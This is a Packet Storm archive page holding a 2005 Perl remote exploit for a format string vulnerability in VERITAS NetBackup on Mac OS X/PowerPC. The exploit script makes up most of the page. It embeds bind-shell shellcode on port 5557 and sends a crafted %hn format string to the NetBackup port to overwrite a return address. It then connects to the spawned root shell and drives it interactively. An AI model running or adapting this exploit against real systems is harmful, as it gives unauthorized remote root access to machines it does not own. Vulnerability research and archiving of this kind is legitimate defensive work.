exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

VERITAS-OSX.pl.txt

VERITAS-OSX.pl.txt
Posted Oct 30, 2005
Authored by John H. | Site digitalmunition.com

VERITAS Netbackup remote format string exploit for Mac OS-X.

tags | exploit, remote
systems | apple, osx
SHA-256 | 40b19b405339547ac14c58e1de679ac1b08b64282cb47cc79e27e76f6c37eef0

VERITAS-OSX.pl.txt

Change Mirror Download
#!/usr/bin/perl
# VERITAS-OSX.pl - VERITAS NetBackup Format Strings OSX/ppc Remote Exploit
# Original code by johnh[at]digitalmunition[dot]com modified by KF to work on OSX / ppc
# bug found by kf_lists[at]digitalmunition[dot]com
# http://www.digitalmunition.com/
#
# This exploit May NOT be posted to a public Archive like k-otik without being
# in its original GPG form (protected by passphrase)

use POSIX;
use IO::Socket;
use IO::Select;

my $shellcode = # /* OSX BINDSHELLCODE PORT=5557 NO-0x0 */
"\x60\x60\x60\x60" x 10 .
"\x7c\x63\x1a\x79\x40\x82\xff\xfd\x7d\xa8\x02\xa6\x38\xc3\xe1\x1d".
"\x39\x80\x01\x18\x39\xad\x1f\xff\x81\xcd\xe1\x21\x81\xed\xe1\x1d".
"\x7d\xef\x72\x78\x91\xed\xe1\x1d\x7c\x06\x68\xac\x7c\x01\x04\xac".
"\x7c\x06\x6f\xac\x4c\x01\x01\x2c\x39\xad\xff\xfc\x39\x8c\xff\xfb".
"\x7d\x8c\x63\x79\x40\x82\xff\xd8\x94\x81\x7d\x7d\x94\x61\x7d\x7e".
"\x94\x41\x7d\x79\x94\xe1\x7d\x1e\xe8\xe1\x7d\x7d\xd0\xe1\x7f\x07".
"\xd0\x9f\x66\x07\xe4\xe1\x7d\x72\xac\xe3\x68\xca\xac\xe1\x7d\x7f".
"\xd0\x69\x7f\xd9\x94\x41\x7d\x6f\x94\xe1\x7d\x17\xd3\x22\x8e\x07".
"\xe8\xe1\x7d\x7d\xd0\xe1\x7f\x07\x94\xe1\x7d\x15\xd3\x22\x8e\x07".
"\xe8\xe1\x7d\x7d\xd0\xe1\x7f\x07\xd3\x22\x8e\x07\x94\xe1\x7d\x61".
"\x94\x61\x7d\x6f\x3c\x60\x82\x97\x94\x40\x82\x97\x94\x60\x82\x8f".
"\xe8\xe1\x7d\x7d\xd0\xe1\x7f\x07\xd0\x9f\x66\x07\x94\x41\x7d\x7d".
"\x94\xe1\x7d\x25\xd3\x22\x8e\x07\xd0\x45\x56\x07\xe8\xe1\x7d\x7d".
"\xd0\xe1\x7f\x07\x94\x44\x82\x80\x80\xe4\x82\x80\xec\x63\x82\x9a".
"\x94\xe1\x7d\x3d\xe8\xe1\x7d\x7d\xd0\xe1\x7f\x07\xd0\x44\x57\x06".
"\xec\x63\x82\x82\xd0\x89\x7f\xd9\x94\x82\x7d\x57\x3c\x80\x82\x87".
"\x3c\x40\x82\x83\x94\x60\x82\x87\x94\xe1\x7d\x44\xd0\xe1\x79\xd3".
"\xe8\xe1\x7d\x7d\xd0\xe1\x7f\x07\xd3\x01\x7d\x77\x83\x83\x14\x11".
"\x83\x82\x0e\x17\xac\xe1\x7d\x7f\xac\xe1\x7d\x7f";

my $host = shift || '192.168.1.111';
my $port = shift || 13722;
my $sock = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp');
$sock or die "no socket :$!";

print $sock " 118 1\n" .
# "a" x 150 . "\n";
$shellcode . "\n";


print scalar <$sock>;
print scalar <$sock>;

#sleep 10;

print $sock " 101 6\n" .

# my $ret = 0xbffe5738; # Saved return from frame 1 vsprintf
# write to 0xbffe5738+2 FIRST then write to 0xbffe5738.
# this allows the wrap past 0xffff to occur so we can form 0010
"\xbf\xfe\x57\x3a" . "ZZZZ" . "\xbf\xfe\x57\x38" . "%x" x 14 .

# shellcode is around 0x001009e8

# "%2474x" # 0x09e8
"%2280x" # 0x0920?
. "%hn" .
"%63212x." # form 0x0010 by wrapping past 0xffff
. "%hn".
"\n" .

"A" x 50 . "\n" .
"B" x 50 . "\n" .
"C" x 50 . "\n" .
# "D" x 50 . "\n" . # shellcode alternate location?
$shellcode . "\n" .
"E" x 50 . "\r\n";

print scalar <$sock>;

close $sock;


my $shellport = 5557;
print "[*] Connect to remote shell port\n";
my $sock = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $host,
PeerPort => $shellport,
Type => SOCK_STREAM
);

if (! $sock)
{
print "[*] Error, Seems Failed\n";
exit (0);
}
print "[*] G0t R00T\n";
StartShell ($sock);
sub StartShell
{
my ($client) = @_;
my $sel = IO::Select->new();


# unbuffered fun.


Unblock(*STDIN);
Unblock(*STDOUT);
Unblock($client);

select($client); $|++;
select(STDIN); $|++;
select(STDOUT); $|++;

$sel->add($client);
$sel->add(*STDIN);

while (fileno($client))
{
my $fd;
my @fds = $sel->can_read(1);
foreach $fd (@fds)
{
my $in = <$fd>;
if (! $in || ! $fd || ! $client)
{
print "[*] Closing connection.\n";
close($client);
exit(0);
}

if ($fd eq $client)
{
print STDOUT $in;
} else {
print $client $in;
}
}
}
close ($client);
exit (0);
}

sub Unblock {
my $fd = shift;
my $flags;
$flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n";
fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n";
}


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close